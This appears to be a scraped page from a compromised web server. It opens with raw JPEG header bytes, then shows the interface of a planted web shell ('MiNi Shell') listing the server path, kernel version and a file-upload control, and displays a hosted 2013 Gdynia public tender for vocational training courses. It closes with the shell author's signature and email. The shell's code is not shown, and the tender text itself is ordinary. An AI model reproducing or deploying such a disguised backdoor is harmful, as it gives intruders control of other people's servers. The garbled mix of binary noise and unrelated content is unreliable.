JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130614/230226-N-2013.html

<p class="kh_header"><b>Gdynia: Usługa zorganizowania szkoleń podnoszących kompetencje zawodowe beneficjentów projektu systemowego Rodzina bliżej siebie w zakresie: 
1) Kurs stylizacji paznokcia I stopnia;
2) Kurs stylizacji paznokcia II stopnia;
3) Kurs florystyki I stopnia;
4) Kurs florystyki III stopnia;
5) Kurs obsługi kasy fiskalnej</b><br>
<b>Numer ogłoszenia: 230226 - 2013; data zamieszczenia: 14.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Grabowo 2, 81-265 Gdynia, woj. pomorskie, tel. 058 7810120, 7820124 w. 55, 38, faks 058 7820124 w. 38.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopsgdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Administracja samorządowa. Pomoc publiczna..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zorganizowania szkoleń podnoszących kompetencje zawodowe beneficjentów projektu systemowego Rodzina bliżej siebie w zakresie: 
1) Kurs stylizacji paznokcia I stopnia;
2) Kurs stylizacji paznokcia II stopnia;
3) Kurs florystyki I stopnia;
4) Kurs florystyki III stopnia;
5) Kurs obsługi kasy fiskalnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa zorganizowania szkoleń podnoszących kompetencje zawodowe beneficjentów projektu systemowego Rodzina bliżej siebie w zakresie: 
1) Kurs stylizacji paznokcia I stopnia;
2) Kurs stylizacji paznokcia II stopnia;
3) Kurs florystyki I stopnia;
4) Kurs florystyki III stopnia;
5) Kurs obsługi kasy fiskalnej.
2. Zakup usługi jest współfinansowany ze środków dotacji rozwojowej Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki udzielonej Zamawiającemu na realizację projektu Rodzina Bliżej Siebie.
3. Zakres usługi:
Wykonawca będzie zobowiązany do zorganizowania szkoleń w powyższym zakresie przy uwzględnieniu następujących wymagań (organizacja każdego z ww. szkoleń musi uwzględniać wszystkie niżej wymienione wymagania):
1) Wykonawca powinien zapewnić uczestnikom na własność materiały szkoleniowe,  tj. podręczniki lub skrypty zgodne z tematyką szkolenia, teczki, notesy, długopisy oraz inny sprzęt/materiały specjalistyczne niezbędne do realizacji szkolenia, w ilości odpowiedniej do liczby uczestników danego szkolenia, w tym: odpowiedniej ilości kas fiskalnych na kursie kas fiskalnych, materiały roślinne i dekoracyjne do kursu florystycznego, materiały kosmetyczne do kursu stylizacja paznokcia itp.
2) Każdy z uczestników szkolenia powinien mieć zapewnione samodzielne i odpowiednio (w sposób adekwatny do zakresu danego szkolenia) wyposażone stanowisko do nauki.
3) Zajęcia teoretyczne zostaną przeprowadzone w pomieszczeniu(-ach) dostosowanym(-ych) do prowadzenia zajęć szkoleniowych i odpowiednio w tym celu wyposażonym(-ych) z zapewnionym zapleczem, posiadającym odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne i jakościowe, z dostępem do toalety oraz szatni. Pomieszczenie musi być wyposażone co najmniej w krzesła w ilości odpowiadającej liczbie uczestników szkolenia, stoły i/lub przestrzeń roboczą umożliwiającą swobodne dokonywanie notatek przez uczestników, tablicę sucho ścieralną i/lub tablicę szkolną, flipchart, projektor multimedialny oraz komputer.
4) Wykonawca zobowiązany jest zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków dla wszystkich uczestników szkolenia.
5) Wykonawca zapewni wszystkim uczestnikom szkolenia w każdym dniu prowadzonych zajęć obiad. 
Wymagania dotyczące obiadu:
5.1) Danie, w skład którego wchodzi co najmniej:
a) porcja ziemniaków lub frytek lub ryżu lub ryżu z warzywami - co najmniej 200 g;
b) porcja mięsa (pieczone, smażone lub duszone) - co najmniej 120 g;
c) surówka - co najmniej 120g.
6) Wykonawca zapewni uczestnikom bez ograniczeń: wodę, soki, kawę, herbatę, cukier, mleko. 
7) Wykonawca zobowiązany jest do zorganizowania i skierowania uczestników na badania lekarskie potwierdzające brak przeciwwskazań do uczestnictwa w danym szkoleniu w przypadku gdy uczestnik nie posiada aktualnych badań w tym zakresie, a takie badania okażą się wymagane w świetle przepisów obowiązującego prawa. 
8) Szkolenie powinno zakończyć się egzaminem sprawdzającym nabyte umiejętności i wydaniem certyfikatu, dyplomu lub zaświadczenia o jego ukończeniu, zgodnie z przepisami ustawy z dnia 7 września 1991r. o systemie oświaty (Dz. U. 2004r. Nr 256, poz. 2572 ze zm.). Ponadto wydane dokumenty winny być oznakowane logiem Europejskiego Funduszu Społecznego i informacją, że projekt był współfinansowany ze środków EFS zgodnie z umową, której wzór stanowi załącznik nr 5 SIWZ. Uwaga!!! Czas trwania egzaminu nie jest wliczony w liczbę wymaganych godzin danego kursu.
9) Zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji, powinien zawierać:
- imię i nazwisko uczestnika szkolenia
- nazwę Wykonawcy przeprowadzającego szkolenie,
- formę i nazwę szkolenia,
- okres trwania szkolenia,
- miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji,
- tematy i wymiar godzin zajęć edukacyjnych,
- podpis osoby upoważnionej przez Wykonawcę przeprowadzającego szkolenie.
	Odbiór w/w dokumentu musi być potwierdzony podpisem przez uczestników szkolenia.
10) Program szkolenia oraz przeprowadzenie danego szkolenia muszą być zgodne z obowiązującymi w tym zakresie przepisami prawa.
11) Zajęcia szkoleniowe mogą odbywać się od poniedziałku do piątku (z wyłączeniem świąt), w przedziale czasowym od 8:00 do 20:00; z zastrzeżeniem, że liczba godzin zajęć szkoleniowych w ciągu jednego dnia nie przekroczy ośmiu. Jedna godzina teoretycznych zajęć szkoleniowych = jedna godzina zegarowa (60 min.), a w tym 45 minut zajęć i 15 minut przerwy. W uzasadnionych przypadkach, na wniosek uczestników szkolenia, Zamawiający, po wcześniejszym uzgodnieniu tego z Wykonawcą, dopuszcza zorganizowanie kursu w soboty.
12) Zajęcia szkoleniowe muszą odbywać się na terenie miasta Gdyni.
13) Wykonawca zobowiązany jest do prowadzenia dokumentacji szkolenia tj. dziennika zajęć, list obecności, list odbioru cateringu, ankiety oceniającej szkolenie, list potwierdzenia odbioru przez uczestnika materiałów szkoleniowych oraz wydania zaświadczenia o ukończeniu szkolenia lub udziale w szkoleniu. Dokumentacja ta winna być sporządzona według zaleceń Zamawiającego.
14) Zamawiający przekaże Wykonawcy informacje i plakaty dotyczące realizacji szkolenia współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego. Informacja o tym, że szkolenie jest współfinansowane ze środków Europejskiego Funduszu Społecznego, zostanie zamieszczona w miejscu odbywania zajęć. Analogicznie zostaną oznakowane materiały edukacyjne oraz świadectwa ukończenia szkolenia, o których mowa zgodnie ze wzorami przekazanymi przez Zamawiającego, a gdy jest to niemożliwe (np. szkolenie kończy się wydaniem świadectwa na formularzu według wzoru Ministerstwa Edukacji Narodowej), uczestnicy otrzymają dodatkowe dyplomy spełniające powyższe wymogi informacyjne.
15) Szkolenia, o których mowa w pkt 1 zostaną zorganizowane w 2013r., na podstawie odrębnych, pisemnych zleceń, określających w szczególności: nazwę danego szkolenia, imiona i nazwiska uczestników szkolenia, termin rozpoczęcia i zakończenia zajęć szkoleniowych.
16) Wykonawca przedstawi Zamawiającemu do zaakceptowania Harmonogram każdego ze szkoleń zawierający m. in. nazwę szkolenia, miejsce prowadzenia zajęć szkoleniowych 
(z podaniem terminów, godzin zajęć szkoleniowych dla poszczególnych wykładów oraz dane wykładowcy/ów). Harmonogramy będą sporządzane zgodnie z zaakceptowanym przez Wykonawcę projektem umowy stanowiącym załącznik Nr 5 do SIWZ.
17) Wykonawca zobowiązany będzie wystawiać faktury częściowe obejmujące kwoty należnego mu wynagrodzenia na warunkach określonych w Projekcie umowy stanowiącym załącznik Nr 5 do SIWZ.
4. Szczegółowe opisy poszczególnych szkoleń są zamieszczone w rozdziale 2 pkt 4 SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa 
w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych. Zamówienia uzupełniające mogą dotyczyć wyłącznie zakresu zamówienia podstawowego i nie mogą przekraczać 40 % jego wartości</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący posiadania uprawnień do wykonywania działalności stanowiącej przedmiot niniejszego zamówienia został spełniony jeżeli Wykonawca posiada zaświadczenie o wpisie do rejestru instytucji szkoleniowych, prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę  instytucji szkoleniowej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący posiadania wiedzy i doświadczenia został spełniony jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług w zakresie organizowania szkoleń o tematyce odpowiadającej przedmiotowi zamówienia, tj.: minimum jedno szkolenie z zakresu - Kurs stylizacji paznokcia oraz minimum jedno szkolenie z zakresu - Kurs florystyki oraz minimum jedno szkolenie z zakresu Kurs obsługi kasy fiskalnej. Przy czym Wykonawca powinien wykazać, że w ramach ww. kursów przeszkolił minimum 40 osób.
(Uwaga! Wykonawca musi wykazać się zrealizowaniem każdego z ww. szkoleń)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z ofertą Wykonawca powinien złożyć:
1) oświadczenia i dokumenty wymagane postanowieniami Rozdziału 5;
2) zaakceptowany przez Wykonawcę wzór Harmonogramu szkolenia, stanowiący Załącznik Nr 4 do SIWZ;
3) dokumenty można złożyć w formie kopii poświadczonej z oryginałem przez wykonawcę.
4) w przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia musi być załączone pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy prawo zamówień publicznych w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
5) w przypadku gdy formularz ofertowy lub załączone do niego dokumenty są podpisane przez osobę, której umocowanie do reprezentowania Wykonawcy nie wynika z wpisu do właściwego rejestru lub ewidencji działalności gospodarczej, do oferty należy dołączyć odpowiednie pełnomocnictwo w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy na uzasadniony wniosek Wykonawcy/Zamawiającego. Dokonywanie zmian jest możliwe o ile wynika to z okoliczności, których, pomimo zachowania należytej staranności, nie można było przewidzieć w chwili zawarcia umowy, i zmiany takie są niezależne od woli stron umowy lub są korzystne dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mopsgdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Gdyni, 81-265 Gdynia, ul. Grabowo 2, w Sekretariacie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Gdyni, 81-265 Gdynia, ul. Grabowo 2, w Sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup usługi jest współfinansowany ze środków dotacji rozwojowej Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki udzielonej Zamawiającemu na realizację projektu Rodzina Bliżej Siebie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com